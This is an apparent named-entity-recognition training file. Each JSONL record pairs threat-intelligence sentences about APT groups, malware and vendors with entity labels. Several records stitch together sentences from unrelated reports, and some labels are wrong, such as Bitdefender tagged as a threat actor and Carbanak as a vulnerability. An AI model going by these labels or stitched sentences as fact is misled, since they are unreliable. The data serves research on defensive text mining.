{"text": "It possesses a wide range of technical exploitation capabilities , significant resources for researching or purchasing complicated zero-day exploits , the ability to sustain persistence across victim networks for years , and the manpower to develop and maintain a large number of tools to use within unique victim networks . The Sogu gang use a custom developed threat – Backdoor.Sogu , whereas the group described in this document use an off the shelf threat – Poison Ivy .", "spans": {"TOOL: technical exploitation capabilities": [[29, 64]], "VULNERABILITY: zero-day exploits": [[131, 148]], "MALWARE: Backdoor.Sogu": [[371, 384]], "MALWARE: Poison Ivy": [[462, 472]]}, "info": {"id": "cyberner_stix_train_000331", "source": "cyberner_stix_train"}}
{"text": "CTU researchers observed the threat actors collecting Cisco VPN profiles to use when accessing the victim's network via VPN .", "spans": {"ORGANIZATION: CTU": [[0, 3]], "ORGANIZATION: Cisco": [[54, 59]], "TOOL: VPN": [[60, 63], [120, 123]]}, "info": {"id": "cyberner_stix_train_000332", "source": "cyberner_stix_train"}}
{"text": "They also state that the code is written from scratch and is not using parts of other existing banking Trojans unlike many other Trojans that are either based completely on the source of another Trojan ( such as the leaked Anubis source code that is now being resold ) or at least borrow parts of other Trojans . The group behind Machete uses effective spearphishing techniques . APT38 's increasingly aggressive targeting against banks and other financial institutions has paralleled North Korea 's worsening financial condition .", "spans": {"MALWARE: Anubis": [[223, 229]], "THREAT_ACTOR: Machete": [[330, 337]], "THREAT_ACTOR: APT38": [[380, 385]], "ORGANIZATION: banks": [[431, 436]], "ORGANIZATION: financial institutions": [[447, 469]]}, "info": {"id": "cyberner_stix_train_000333", "source": "cyberner_stix_train"}}
{"text": "Currently Running Applications Banking Trojans that rely on the overlay mechanism to steal information need to know what application is in the foreground . Certain details , such as using the same infrastructure and targeting , make us believe that Operation Daybreak is being done by the ScarCruft APT group . Interestingly, the FBI website for wanted cybercriminals includes two Iranians called Mohammad Reza, although this could be a common name or even a false . Among the IP addresses owned by Hack520 is a whole/22 IP Range which we dubbed as the “ PIG RANGE ” .", "spans": {"THREAT_ACTOR: ScarCruft": [[289, 298]], "THREAT_ACTOR: APT group": [[299, 308]], "ORGANIZATION: FBI": [[330, 333]], "ORGANIZATION: Hack520": [[499, 506]]}, "info": {"id": "cyberner_stix_train_000334", "source": "cyberner_stix_train"}}
{"text": "For example , the password of the WiFi network used by the phone was stored in the folder /storage/emulated/0/.lost+found/0BBDA068-9D27-4B55-B226-299FCF2B4242/ using the following file name format DD_MM_2019_HH_mm_ss_XXXXXXXXXXXXX.txt.crypt ( the datetime followed by the IMEI ) . While there have been several Suckfly campaigns that infected organizations with the group 's custom malware Backdoor.Nidiran , the Indian targets show a greater amount of post-infection activity than targets in other regions . Federation of Independent Palestinian Communities and Organizations and Events in the Diaspora . This is clear and shocking evidence of a deliberate and malicious attack by Russia against Ukraine which had significant consequences on ordinary people and businesses in Ukraine and across Europe .", "spans": {"MALWARE: Backdoor.Nidiran": [[390, 406]], "ORGANIZATION: Federation of Independent Palestinian Communities and Organizations and Events": [[509, 587]], "MALWARE: malicious attack": [[662, 678]], "THREAT_ACTOR: Russia": [[682, 688]], "ORGANIZATION: Ukraine": [[697, 704]]}, "info": {"id": "cyberner_stix_train_000335", "source": "cyberner_stix_train"}}
{"text": "The malware was able to perform overlay attacks and become the default SMS app through the abuse of the Accessibility Service . A sustained cyberespionage campaign targeting at least three companies in the United States and Europe was uncovered by Recorded Future and Rapid7 between November 2017 and September 2018 . It has targeted countries including Israel , Saudi Arabia , Turkey , the U.S. , Jordan , and Germany .", "spans": {"ORGANIZATION: Recorded Future": [[248, 263]], "ORGANIZATION: Rapid7": [[268, 274]]}, "info": {"id": "cyberner_stix_train_000336", "source": "cyberner_stix_train"}}
{"text": "10/03/2020 At the end of February the actors behind Ginp added screen capture capabilities to their Trojan . During this operation (dubbed ‘Cloud Hopper” because of the group’s use of popular western cloud-based services) , APT10 utilized both new malware (Quasar RAT , Trochilus , RedLeaves , ChChes as well as some familiar old tools . The threat often uses compromised web servers in Japan and the Republic of Korea .", "spans": {"MALWARE: Ginp": [[52, 56]], "THREAT_ACTOR: APT10": [[224, 229]], "TOOL: (Quasar RAT": [[256, 267]], "TOOL: Trochilus": [[270, 279]], "TOOL: RedLeaves": [[282, 291]], "TOOL: ChChes": [[294, 300]]}, "info": {"id": "cyberner_stix_train_000337", "source": "cyberner_stix_train"}}
{"text": "We do not know whether the files are legitimate Palestinian Authority documents , but they are designed to look official .", "spans": {"ORGANIZATION: Palestinian Authority": [[48, 69]]}, "info": {"id": "cyberner_stix_train_000338", "source": "cyberner_stix_train"}}
{"text": "At that time it was the name of a cybercriminal group that was stealing money from Russian financial establishments — to the tune of at least $150,000 per hit . TG-3390 uses the PlugX remote access tool .", "spans": {"ORGANIZATION: financial establishments": [[91, 115]], "THREAT_ACTOR: TG-3390": [[161, 168]], "MALWARE: PlugX remote access tool": [[178, 202]]}, "info": {"id": "cyberner_stix_train_000339", "source": "cyberner_stix_train"}}
{"text": "Talos found 189 logos from banks to cryptocurrency exchanges inside the archive , all of which could be targeted . The group has focused mainly on governmental targets in Iraq and Saudi Arabia , according to past telemetry . Derusbi : File Name : 32.dll . We have observed TANKTRAP being used with other disruptive tools including NEARMISS , SDELETE , PARTYTICKET , and CADDYWIPER .", "spans": {"THREAT_ACTOR: group": [[119, 124]], "ORGANIZATION: governmental": [[147, 159]], "MALWARE: Derusbi": [[225, 232]], "FILEPATH: 32.dll": [[247, 253]], "TOOL: TANKTRAP": [[273, 281]]}, "info": {"id": "cyberner_stix_train_000340", "source": "cyberner_stix_train"}}
{"text": "REQUEST_IGNORE_BATTERY_OPTIMIZATIONS - Whitelists the application to allow it to ignore battery optimizations . Bitdefender’s forensics and investigation team was contacted to look into a security incident that started in May 2018 with an email received by two of the bank’s employees . Starting in mid-February .", "spans": {"THREAT_ACTOR: Bitdefender’s": [[112, 125]], "ORGANIZATION: bank’s": [[268, 274]]}, "info": {"id": "cyberner_stix_train_000341", "source": "cyberner_stix_train"}}
{"text": "This group has no known associations to other activity groups .", "spans": {}, "info": {"id": "cyberner_stix_train_000342", "source": "cyberner_stix_train"}}
{"text": "While one of these modules gathers system information and another attempts to steal the victim ’s usernames and passwords , as one would expect from a malware used for a targeted attack , the other two known OnionDuke modules are quite the opposite ; one is designed for use in DoS S-TOOL attacks and the other for posting predetermined messages to the Russian VKontakte social media site .", "spans": {"MALWARE: OnionDuke": [[208, 217]], "TOOL: VKontakte": [[361, 370]]}, "info": {"id": "cyberner_stix_train_000343", "source": "cyberner_stix_train"}}
{"text": "These samples were located by pivoting on document attributes .", "spans": {}, "info": {"id": "cyberner_stix_train_000344", "source": "cyberner_stix_train"}}
{"text": "This document reports that Ismail Hanieyh , the political leader of Hamas , had notified the Egyptian government that he will remain abroad after his visit to Tehran to take part in Soleimani ’s funeral , which sparked tension with the Egyptian authorities .", "spans": {}, "info": {"id": "cyberner_stix_train_000345", "source": "cyberner_stix_train"}}
{"text": "The discovery of this new PLATINUM technique and the development of detection capabilities highlight the work the Windows Defender ATP team does to provide customers greater visibility into suspicious activities transpiring on their networks . This particular threat was also used by hackers to compromise a Korean social network site to steal records of 35 million users .", "spans": {"THREAT_ACTOR: PLATINUM": [[26, 34]], "ORGANIZATION: Windows Defender ATP": [[114, 134]]}, "info": {"id": "cyberner_stix_train_000346", "source": "cyberner_stix_train"}}
{"text": "The discovery by Kaspersky marks at least the fifth zero-day exploit used by BlackOasis and exposed by security researchers since June 2015 . Also , by creating this type of API access , Turla could use one accessible server as a single point to dump data to and exfiltrate data from .", "spans": {"ORGANIZATION: Kaspersky": [[17, 26]], "VULNERABILITY: zero-day exploit": [[52, 68]], "THREAT_ACTOR: BlackOasis": [[77, 87]], "THREAT_ACTOR: Turla": [[187, 192]]}, "info": {"id": "cyberner_stix_train_000347", "source": "cyberner_stix_train"}}
{"text": "WAKE_LOCK - Allows the application to use PowerManager WakeLocks to keep the processor from sleeping or the screen from dimming . A Carbanak trademark in cyberattacks remains the use of Cobalt Strike – a powerful pentesting tool designed for exploiting and executing malicious code , simulating post-exploitation actions of advanced threat actors – which allows them to infiltrate the organization , move laterally , exfiltrate data , and deploy anti-forensic and evasion tools . Leveraging click counts for the campaign for Bitly , we were able to see Gorgon Group 's activity volume increase throughout April .", "spans": {"THREAT_ACTOR: Carbanak": [[132, 140]], "TOOL: Cobalt Strike": [[186, 199]], "MALWARE: Bitly": [[525, 530]], "THREAT_ACTOR: Gorgon Group": [[553, 565]]}, "info": {"id": "cyberner_stix_train_000348", "source": "cyberner_stix_train"}}
{"text": "Malware code showing handover from initial module to main payload Figure 13 . APT15 is known for committing cyberespionage against companies and organizations located in many different countries , targeting different sectors such as the oil industry , government contractors , military , and more . We used different archiving tools such as PowerArchiver 2019 , WinZip , WinRar , 7Zip , and unzIP S-TOOL that is built into the Windows OS in attempting to extract the content of the attachment SHIPPING_MX00034900_PL_INV_pdf.zip . While this shift likely reflects the increased tempo of wartime cyber operations , it also reveals the GRU ’s priority objectives in OT attacks .", "spans": {"THREAT_ACTOR: APT15": [[78, 83]], "THREAT_ACTOR: cyberespionage": [[108, 122]], "ORGANIZATION: oil industry": [[237, 249]], "ORGANIZATION: government contractors": [[252, 274]], "ORGANIZATION: military": [[277, 285]], "TOOL: PowerArchiver 2019": [[341, 359]], "TOOL: WinZip": [[362, 368]], "TOOL: WinRar": [[371, 377]], "TOOL: 7Zip": [[380, 384]], "TOOL: unzIP S-TOOL": [[391, 403]], "SYSTEM: Windows": [[427, 434]], "FILEPATH: SHIPPING_MX00034900_PL_INV_pdf.zip": [[493, 527]], "THREAT_ACTOR: OT attacks .": [[663, 675]]}, "info": {"id": "cyberner_stix_train_000349", "source": "cyberner_stix_train"}}
{"text": "The actor sends an email to trala.cosh2@post.cz with the unique system identifier as a subject with a secondary email account and credentials in ASCII hexadecimal format within the message body .", "spans": {"TOOL: email": [[19, 24], [112, 117]], "EMAIL: trala.cosh2@post.cz": [[28, 47]], "TOOL: ASCII": [[145, 150]]}, "info": {"id": "cyberner_stix_train_000350", "source": "cyberner_stix_train"}}
{"text": "Comparing it to OSX_DOK.C , we can see that it uses the same script format .", "spans": {"MALWARE: OSX_DOK.C": [[16, 25]]}, "info": {"id": "cyberner_stix_train_000351", "source": "cyberner_stix_train"}}
{"text": "This simulation shows that FakeSpy behaves differently on a physical device versus an emulator . Given FIN7’s previous use of false security companies , we decided to look deeper into this one . During our period of visibility into the BS2005 \" moviestar \" campaign against various ministries of foreign affairs in Europe , FireEye discovered that the Ke3chang had initially tested the malware in virtual machines , prior to compromising actual targets .", "spans": {"MALWARE: FakeSpy": [[27, 34]], "THREAT_ACTOR: FIN7’s": [[103, 109]], "ORGANIZATION: security companies": [[132, 150]], "ORGANIZATION: ministries of foreign affairs": [[282, 311]], "ORGANIZATION: FireEye": [[324, 331]], "THREAT_ACTOR: Ke3chang": [[352, 360]]}, "info": {"id": "cyberner_stix_train_000353", "source": "cyberner_stix_train"}}
{"text": "Note that inside this single response , there is one “ install_true ” command , one “ sms_grab ” command and four “ sms_send ” commands . In July 2017 , we observed APT34 targeting a Middle East organization using a PowerShell-based backdoor that we call POWRUNER and a downloader with domain generation algorithm functionality that we call BONDUPDATER , based on strings within the malware . Everything starts with a malicious document using a well-known vulnerability to download a malicious document hosted on the internet . It is possible that the malware was used to support exercises such as the ones hosted by Rostelecom - Solar in 2021 in collaboration with the Russian Ministry of Energy or in 2022 for the ( SPIEF ) .", "spans": {"THREAT_ACTOR: APT34": [[165, 170]], "TOOL: PowerShell-based backdoor": [[216, 241]], "TOOL: POWRUNER": [[255, 263]], "TOOL: BONDUPDATER": [[341, 352]], "MALWARE: malware": [[552, 559]], "ORGANIZATION: Rostelecom - Solar": [[617, 635]], "ORGANIZATION: Russian Ministry of Energy": [[670, 696]], "ORGANIZATION: SPIEF": [[718, 723]]}, "info": {"id": "cyberner_stix_train_000354", "source": "cyberner_stix_train"}}
{"text": "Each of the phishing sites contained links to a distribution manifest , which contained metadata such as the application name , version , icon , and a URL for the IPA file . Leafminer has developed exploit payloads for this framework ( Table 2 ) that deliver custom malware through attacks against SMB vulnerabilities described by Microsoft . In May 2018 , Trend Micro found a new sample ( Detected as W2KM_DLOADR.UHAOEEN ) that may be related to this campaign .", "spans": {"THREAT_ACTOR: Leafminer": [[174, 183]], "VULNERABILITY: SMB vulnerabilities": [[298, 317]], "ORGANIZATION: Microsoft": [[331, 340]], "ORGANIZATION: Trend Micro": [[357, 368]], "MALWARE: W2KM_DLOADR.UHAOEEN": [[402, 421]]}, "info": {"id": "cyberner_stix_train_000355", "source": "cyberner_stix_train"}}
{"text": "TONEDEAF supports collecting system information , uploading and downloading of files , and arbitrary shell command execution . Attackers have been known to distribute malicious files masquerading as the legitimate iviewers.dll file and then use DLL load hijacking to execute the malicious code and infect the computer .", "spans": {"MALWARE: TONEDEAF": [[0, 8]], "FILEPATH: malicious files": [[167, 182]], "MALWARE: iviewers.dll file": [[214, 231]], "MALWARE: DLL load hijacking": [[245, 263]]}, "info": {"id": "cyberner_stix_train_000356", "source": "cyberner_stix_train"}}
{"text": "While admittedly the version numbers provided by SharePoint within HTTP responses do not always provide the precise SharePoint version number , we decided to use it to check if it was less than the version numbers of the patched SharePoint versions from the Microsoft advisory .", "spans": {"TOOL: SharePoint": [[49, 59], [116, 126], [229, 239]], "ORGANIZATION: Microsoft": [[258, 267]]}, "info": {"id": "cyberner_stix_train_000357", "source": "cyberner_stix_train"}}
{"text": "The website uses a different fixed twitter account ( https : //twitter.com/fdgoer343 ) . APT17 was embedding the encoded CnC IP address for the BLACKCOFFEE malware in legitimate Microsoft TechNet profiles pages and forum threads , a method some in the information security community call a \" dead drop resolver \" . The controller issued the command to write the base64-decoded and modified data to the file name set earlier in the exchange . Talos eventually uncovered additional campaigns , including the two previously mentioned by Ukraine ’s Computer Emergency Response Team ( CERT - UA ) and FortiGuard Labs researchers .", "spans": {"ORGANIZATION: twitter": [[35, 42]], "THREAT_ACTOR: APT17": [[89, 94]], "TOOL: BLACKCOFFEE malware": [[144, 163]], "ORGANIZATION: information security community": [[252, 282]], "ORGANIZATION: Talos": [[442, 447]], "ORGANIZATION: Ukraine ’s Computer Emergency Response Team ( CERT - UA )": [[534, 591]], "ORGANIZATION: FortiGuard Labs researchers": [[596, 623]]}, "info": {"id": "cyberner_stix_train_000358", "source": "cyberner_stix_train"}}
{"text": "After some major upgrade , by mid-June , the “ Agent Smith ” campaign reached its peak . In order to increase the likelihood of their malware successfully communicating home , cyber espionage threat actors are increasingly abusing legitimate web services , in lieu of DNS lookups to retrieve a command and control address . With these capabilities , Microsoft Defender ATP provides comprehensive protection against Dexphot and the countless other complex and evolving threats that we face every day . To increase investigation transparency , we are including a Last Known True , or LKT , value for network indicators .", "spans": {"MALWARE: Agent Smith": [[47, 58]], "TOOL: Microsoft Defender ATP": [[350, 372]], "MALWARE: Dexphot": [[415, 422]]}, "info": {"id": "cyberner_stix_train_000359", "source": "cyberner_stix_train"}}
{"text": "The group has demonstrated access to zero-day vulnerabilities (CVE-2018-0802) , and the ability to incorporate them into operations . which has been active since at least 2011 .", "spans": {"THREAT_ACTOR: group": [[4, 9]], "VULNERABILITY: (CVE-2018-0802)": [[62, 77]]}, "info": {"id": "cyberner_stix_train_000360", "source": "cyberner_stix_train"}}
{"text": "Some of the observed GeminiDuke samples that used timestamps as mutex names were compiled while MSK still respected DST and for these samples , the timestamps perfectly align with MSK as it was defined at the time .", "spans": {"MALWARE: GeminiDuke": [[21, 31]]}, "info": {"id": "cyberner_stix_train_000361", "source": "cyberner_stix_train"}}
{"text": "Harvested credentials provided by an embedded Mimikatz executable facilitate the infection of other systems on the network . which they launched targeted attacks against Russian banks , businesses and media companies .", "spans": {"MALWARE: Mimikatz": [[46, 54]], "ORGANIZATION: banks": [[178, 183]], "ORGANIZATION: businesses": [[186, 196]], "ORGANIZATION: media companies": [[201, 216]]}, "info": {"id": "cyberner_stix_train_000362", "source": "cyberner_stix_train"}}
{"text": "This led us to additional infrastructure for Zebrocy at 185.25.51.198 and 185.25.50.93 .", "spans": {"MALWARE: Zebrocy": [[45, 52]], "IP_ADDRESS: 185.25.51.198": [[56, 69]], "IP_ADDRESS: 185.25.50.93": [[74, 86]]}, "info": {"id": "cyberner_stix_train_000363", "source": "cyberner_stix_train"}}
{"text": "It also harvests call details and SMS logs as shown below . The admin@338 linked to China and alleged to be responsible for targeted attacks against foreign governments and ministries , has now pointed its focus inward at China autonomous territory Hong Kong . In other recent attacks ( January 2017 ) , the group used a fake Juniper Networks VPN portal and fake University of Oxford websites to deliver malware as described by ClearSky . UNC2452 is a sophisticated group that has targeted government and private sector entities worldwide .", "spans": {"THREAT_ACTOR: admin@338": [[64, 73]], "ORGANIZATION: governments": [[157, 168]], "TOOL: Juniper Networks VPN": [[326, 346]], "ORGANIZATION: University of Oxford": [[363, 383]], "ORGANIZATION: ClearSky": [[428, 436]], "THREAT_ACTOR: UNC2452": [[439, 446]], "ORGANIZATION: government": [[490, 500]], "ORGANIZATION: private sector entities worldwide": [[505, 538]]}, "info": {"id": "cyberner_stix_train_000364", "source": "cyberner_stix_train"}}
{"text": "Like many espionage campaigns , much of APT40 's activity begins by attempting to trick targets with phishing emails , before deploying malware such as the Gh0st RAT trojan to maintain persistence on a compromised network . CTU researchers assess with high confidence that threat groups like Threat Group-1314 will continue to live off of the land to avoid detection and conduct their operations .", "spans": {"THREAT_ACTOR: APT40": [[40, 45]], "TOOL: Gh0st RAT trojan": [[156, 172]], "ORGANIZATION: CTU": [[224, 227]], "THREAT_ACTOR: Threat Group-1314": [[292, 309]]}, "info": {"id": "cyberner_stix_train_000365", "source": "cyberner_stix_train"}}
{"text": "The primary goal of these attacks was likely to find code-signing certificates for signing future malware . Aside from the competitive vendor naming landscape ( which I am not a fan of in cases on direct overlap , but which has more to say for itself when different methodologies are employed around similar observations ) , the distinction between FireEye and Dragos' approaches with respect to the \" TRITON actor \" comes down to fundamental philosophical differences in methodology .", "spans": {"ORGANIZATION: FireEye": [[349, 356]], "ORGANIZATION: Dragos'": [[361, 368]], "MALWARE: TRITON": [[402, 408]]}, "info": {"id": "cyberner_stix_train_000366", "source": "cyberner_stix_train"}}
{"text": "Devices running Android 4.4 and higher are protected by Verified Boot . Kaspersky Lab 's products detect the Microsoft Office exploits used in the spear-phishing attacks , including Exploit.MSWord.CVE-2010-333 , Exploit.Win32.CVE-2012-0158 . APT16 actors were likely also responsible for the June 2015 activity . Uncovering weaknesses in Apple macOS and VMWare vCenter : 12 vulnerabilities in RPC implementation •", "spans": {"SYSTEM: Android 4.4": [[16, 27]], "ORGANIZATION: Kaspersky Lab": [[72, 85]], "VULNERABILITY: Microsoft Office exploits": [[109, 134]], "MALWARE: Exploit.MSWord.CVE-2010-333": [[182, 209]], "MALWARE: Exploit.Win32.CVE-2012-0158": [[212, 239]], "THREAT_ACTOR: APT16": [[242, 247]], "SYSTEM: Apple macOS": [[338, 349]], "SYSTEM: VMWare vCenter": [[354, 368]]}, "info": {"id": "cyberner_stix_train_000367", "source": "cyberner_stix_train"}}
{"text": "After the checks , the malware becomes active , but first , it goes through seven steps , each one calling a different command : uploadPhoneNumbers : Exfiltrates all phone numbers that are in the contact list . The Seedworm group controls its Powermud backdoor from behind a proxy network to hide the ultimate command-and-control ( C&C ) location . The DllInstall export function is responsible for the core behavior of the malware , as just loading it does nothing . For this reason , the particular actions intended by the actor are unclear without further knowledge about the targeted assets .", "spans": {"THREAT_ACTOR: Seedworm group": [[215, 229]], "TOOL: Powermud backdoor": [[243, 260]], "TOOL: command-and-control": [[310, 329]], "MALWARE: DllInstall": [[353, 363]], "THREAT_ACTOR: actor": [[525, 530]]}, "info": {"id": "cyberner_stix_train_000368", "source": "cyberner_stix_train"}}
{"text": "This check serves two purposes :", "spans": {}, "info": {"id": "cyberner_stix_train_000369", "source": "cyberner_stix_train"}}
{"text": "This variant of SofacyCarberp was configured to use the following domain as its C2 server : cdnverify.net .", "spans": {"MALWARE: SofacyCarberp": [[16, 29]], "TOOL: C2": [[80, 82]], "DOMAIN: cdnverify.net": [[92, 105]]}, "info": {"id": "cyberner_stix_train_000370", "source": "cyberner_stix_train"}}
{"text": "One of its most notable routines is capturing voice calls in real time by hooking into the “ mediaserver ” system service . To reduce the risk of losing access to the internal bank network , the Carbanak , in addition to malicious programs , also used for remote access legitimate programs such as Ammy Admin and Team Viewer . referred in his blog ) None Use of open source libraries for protocol implementation : The availability of open source projects that implement OT protocols can lower the barrier of entry for actors attempting to interact with OT devices .", "spans": {"VULNERABILITY: Carbanak": [[195, 203]], "TOOL: Ammy Admin": [[298, 308]], "TOOL: Team Viewer": [[313, 324]], "TOOL: open source libraries for protocol implementation": [[362, 411]], "TOOL: open source projects that implement OT protocols": [[434, 482]]}, "info": {"id": "cyberner_stix_train_000371", "source": "cyberner_stix_train"}}
{"text": "In that case , you first need to send the text “ 393838 ” in an SMS to the infected device and then repeat all the actions described above ; that text message will change the C & C address to “ : // ” , so the phone will no longer receive commands from the real C & C . We initially became aware of Careto when we observed attempts to exploit a vulnerability in our products to make the malware \" invisible \" in the system . Since early 2018 , FireEye ( including our FireEye as a Service ( FaaS ) , Mandiant Consulting , and iSIGHT Intelligence teams ) has been tracking an ongoing wave of intrusions targeting engineering and maritime entities , especially those connected to South China Sea issues .", "spans": {"MALWARE: Careto": [[299, 305]], "ORGANIZATION: FireEye": [[444, 451], [468, 475]], "ORGANIZATION: FaaS": [[491, 495]], "ORGANIZATION: Mandiant Consulting": [[500, 519]], "ORGANIZATION: iSIGHT Intelligence": [[526, 545]], "ORGANIZATION: engineering": [[612, 623]], "ORGANIZATION: maritime entities": [[628, 645]]}, "info": {"id": "cyberner_stix_train_000372", "source": "cyberner_stix_train"}}
{"text": "If you ’ ve downloaded one of the apps listed in Appendix A , below , you might be infected . We attribute APT38 to North Korean state-sponsored operators based on a combination of technical indicators linking the activity to Pyongyang and details released by DOJ implicating North Korean national Park Jin Hyok in a criminal conspiracy . to MMAT_GLBOPT2 ( most global optimizations completed ) However , twice this year , in March and June , LockBit 's considerable rate of attacks was vastly exceeded by CL0P , which was otherwise dormant .", "spans": {"THREAT_ACTOR: APT38": [[107, 112]], "THREAT_ACTOR: operators": [[145, 154]], "TOOL: MMAT_GLBOPT2": [[342, 354]], "THREAT_ACTOR: LockBit": [[443, 450]], "THREAT_ACTOR: CL0P": [[506, 510]]}, "info": {"id": "cyberner_stix_train_000373", "source": "cyberner_stix_train"}}
{"text": "The HawkEye malware is primarily used for credential theft and is often combined with additional tools to extract passwords from email and web browser applications . APT28 targets Russian rockers and dissidents Pussy Riot via spear-phishing emails .", "spans": {"TOOL: HawkEye malware": [[4, 19]], "THREAT_ACTOR: APT28": [[166, 171]], "ORGANIZATION: rockers": [[188, 195]], "ORGANIZATION: dissidents Pussy Riot": [[200, 221]], "TOOL: emails": [[241, 247]]}, "info": {"id": "cyberner_stix_train_000374", "source": "cyberner_stix_train"}}
{"text": "In 2011-2012 , the group used a relatively tiny implant ( known as “ Sofacy ” or SOURFACE ) as their first stage malware , which at the time had similarities with the old Miniduke implants .", "spans": {"THREAT_ACTOR: Sofacy": [[69, 75]], "THREAT_ACTOR: SOURFACE": [[81, 89]]}, "info": {"id": "cyberner_stix_train_000375", "source": "cyberner_stix_train"}}
{"text": "The identified email owners held a wide range of responsibilities within the Hillary for America campaign , extending from senior figures to junior employees and the group mailboxes for various regional offices .", "spans": {"TOOL: email": [[15, 20]]}, "info": {"id": "cyberner_stix_train_000376", "source": "cyberner_stix_train"}}
{"text": "1664cb343ee830fa94725fed143b119f7e2351307ed0ce04724b23469b9002f2 Loaded DEX SHA2 : afaf446a337bf93301b1d72855ccdd76112595f6e4369d977bea6f9721edf37e Domain/IP : goldncup [ . Specifically , the targeting of organizations in the aerospace and energy sectors indicates that the APT33 is likely in search of strategic intelligence capable of benefitting a government or military sponsor . Remexi boasts features that allow it to gather keystrokes, take screenshots of Windows of interest (as defined in its configuration), steal credentials, logons and the browser history, and execute remote . Since 2021 , there have been multiple leaks of ransomware source code and builders components that are essential to creating and modifying ransomware .", "spans": {"ORGANIZATION: aerospace": [[226, 235]], "ORGANIZATION: energy sectors": [[240, 254]], "THREAT_ACTOR: APT33": [[274, 279]], "ORGANIZATION: government": [[351, 361]], "ORGANIZATION: military": [[365, 373]], "MALWARE: Remexi": [[384, 390]], "SYSTEM: Windows": [[463, 470]], "VULNERABILITY: multiple leaks of ransomware source code": [[619, 659]]}, "info": {"id": "cyberner_stix_train_000377", "source": "cyberner_stix_train"}}
{"text": "We have discovered apps using AES , Blowfish , and DES as well as combinations of these to encrypt their strings . More than half of the organizations we have observed being targeted or breached by APT5 operate in these sectors . SC Service control command , implemented as the Windows one . Our initial investigation on the domains registered by Hack520 revealed that similar domains ( listed below ) were registered by another profile .", "spans": {"SYSTEM: Windows": [[278, 285]], "THREAT_ACTOR: Hack520": [[347, 354]]}, "info": {"id": "cyberner_stix_train_000378", "source": "cyberner_stix_train"}}
{"text": "By comparing the sizes of the encrypted asset file tong.luo vs the decrypted JAR file mycode.jar , it is interesting to note that it is the same file ( almost the same size ) . The timeline shows three main clusters of activity across the three webshells , with activity occurring on two separate webshells (green and orange) within a very small window of time on April 2 , 2019 and the activity involving the third webshell two weeks later on April 16 , 2019 . While Gorgon Group has been making minor changes in their methodologies , they are still actively involved in both targeted and criminal attacks .", "spans": {"THREAT_ACTOR: Gorgon Group": [[468, 480]]}, "info": {"id": "cyberner_stix_train_000379", "source": "cyberner_stix_train"}}
{"text": "Due to this obfuscation , a part of the previously mentioned cfg class is now mapped to c/b/a/a/a or c/a/a/a/a . By listing sub-folders , SWAnalytics is able to infer QQ accounts which have never been used on the device . The persistent use of social media to identify and manipulate victims indicates that COBALT GYPSY successfully achieves its objectives using this tactic .", "spans": {"MALWARE: SWAnalytics": [[138, 149]], "ORGANIZATION: social media": [[244, 256]], "THREAT_ACTOR: COBALT GYPSY": [[307, 319]]}, "info": {"id": "cyberner_stix_train_000380", "source": "cyberner_stix_train"}}
{"text": "Third-party app stores are ubiquitous in China for a number of reasons including : evermore powerful Chinese Original Equipment Manufacturers ( OEM ) , a lack of an official Chinese Google Play app store , and a growing smartphone market . We didn’t choose to name it after a vegetable; the .NET malware developers named it Topinambour themselves . While APT1 intruders occasionally use publicly available backdoors such as Poison Ivy and Gh0st RAT .", "spans": {"ORGANIZATION: Chinese Original Equipment Manufacturers ( OEM )": [[101, 149]], "SYSTEM: Google Play": [[182, 193]], "MALWARE: .NET malware": [[291, 303]], "MALWARE: Topinambour": [[324, 335]], "THREAT_ACTOR: APT1": [[355, 359]], "MALWARE: publicly available backdoors": [[387, 415]], "MALWARE: Poison Ivy": [[424, 434]], "MALWARE: Gh0st RAT": [[439, 448]]}, "info": {"id": "cyberner_stix_train_000381", "source": "cyberner_stix_train"}}
{"text": "After initialization , the artifact will attempt to establish a connection by creating a socket .", "spans": {}, "info": {"id": "cyberner_stix_train_000382", "source": "cyberner_stix_train"}}
{"text": "In red , we see those values being passed into the suspicious Java method through the registered interface . Our primary contribution in this update is to implicate Bahamut in what are likely counterterrorism-motivated surveillance operations , and to further affirm our belief that the group is a hacker-for-hire operation . ZxFunction002 This will either bind the calling process to a port or has the calling process connect to a remote host . Therefore , there are cases where these vulnerabilities are accessible via the internet .", "spans": {"VULNERABILITY: vulnerabilities are accessible via the internet": [[486, 533]]}, "info": {"id": "cyberner_stix_train_000383", "source": "cyberner_stix_train"}}
{"text": "Where possible , minimize server fingerprinting by configuring web servers to avoid responding with banners identifying the server software and version number .", "spans": {"TOOL: web servers": [[63, 74]]}, "info": {"id": "cyberner_stix_train_000384", "source": "cyberner_stix_train"}}
{"text": "Both the loader and dropped class are obfuscated using ProGuard , which obfuscates names using alphabet letters . This module monitors a wide range of device activities including application installation / remove / update , phone restart and battery charge . These characteristics suggest that COBALT GYPSY executed the January and February phishing campaigns and that it created the Mia Ash persona .", "spans": {"MALWARE: module": [[119, 125]], "THREAT_ACTOR: COBALT GYPSY": [[294, 306]], "THREAT_ACTOR: Mia Ash": [[384, 391]]}, "info": {"id": "cyberner_stix_train_000385", "source": "cyberner_stix_train"}}
{"text": "The purely nominal control over the applications uploaded to these stores means attackers can conceal Trojans in apps made to look like innocent games or utilities . The initial attack vector used in the attack against the data center is unclear , but researchers believe LuckyMouse possibly had conducted watering hole or phishing attacks to compromise accounts belonging to employees at the national data center . In this case the legitimate hpqhvind.exe was dropped by the attackers , along with their malicious hpqhvsei.dll , in C:\\Windows\\Temp . KillNet has remained relatively consistent in its targeting of Ukraine ’s supporters and prioritization of DDoS attacks since Russia invaded in February 2022 , and despite new capabilities , the collective has hardly altered its targeting patterns .", "spans": {"THREAT_ACTOR: LuckyMouse": [[272, 282]], "ORGANIZATION: employees": [[376, 385]], "FILEPATH: hpqhvind.exe": [[444, 456]], "FILEPATH: hpqhvsei.dll": [[515, 527]], "THREAT_ACTOR: DDoS attacks": [[658, 670]]}, "info": {"id": "cyberner_stix_train_000386", "source": "cyberner_stix_train"}}
